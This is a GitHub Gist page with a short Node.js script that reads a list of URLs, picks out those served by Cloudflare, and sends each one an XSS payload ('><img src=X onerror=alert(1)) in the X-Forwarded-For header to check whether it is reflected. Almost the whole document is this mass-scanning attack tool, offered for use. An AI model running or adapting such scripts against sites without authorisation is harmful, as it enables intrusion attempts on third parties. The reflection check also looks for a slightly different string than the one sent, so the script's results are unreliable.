Last active
May 9, 2021 00:47
-
-
Save mirhatx/3bda6afb19b849598916ad1b64205cd4 to your computer and use it in GitHub Desktop.
X-Forwarded-For Script(cloudflare) for XSS
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| const axios = require('axios'); | |
| var fs = require('fs'); | |
| // npm install axios | |
| // to run it: node file.js file.txt | |
| // Target server's name may be different from cloudflare | |
| // Which means we can miss some vulnerabilities | |
| const array = fs.readFileSync('file.txt', 'utf8').split('\n'); | |
| const cloudflare = [] | |
| const checkServerName = (servername,main) => { | |
| if(servername == 'cloudflare' || servername == 'CLOUDFLARE' || servername == 'Cloudflare'){ | |
| cloudflare.push(main) | |
| } | |
| } | |
| const firstOne = () => { | |
| for(i in array){ | |
| axios.get(array[i]).then(re => { | |
| checkServerName(re.headers.server, re.config.url) | |
| }).catch(err => { | |
| console.log(`error occured`) | |
| }) | |
| } | |
| } | |
| firstOne() | |
| setTimeout(() => { | |
| send() | |
| }, 2000); | |
| const checkReflection = (rdata,url) => { | |
| if(rdata.includes("<img src=X onerror=alert(1)>")){ | |
| console.log(`XSS found on ${url}`) | |
| } | |
| } | |
| function send(){ | |
| for(let i=0; i < cloudflare.length; i++){ | |
| axios.get(cloudflare[i], {headers: {"x-forwarded-for":"'><img src=X onerror=alert(1)"}}).then(resp => { | |
| if(resp.status === 200){ | |
| console.log(`Possible vuln: ${resp.config.url.split("https://")}`); | |
| } | |
| checkReflection(resp.data,resp.config.url) | |
| }).catch(e => { | |
| if(e){ | |
| console.log(`Forbidden header => ${cloudflare[i]}`) | |
| } | |
| }) | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment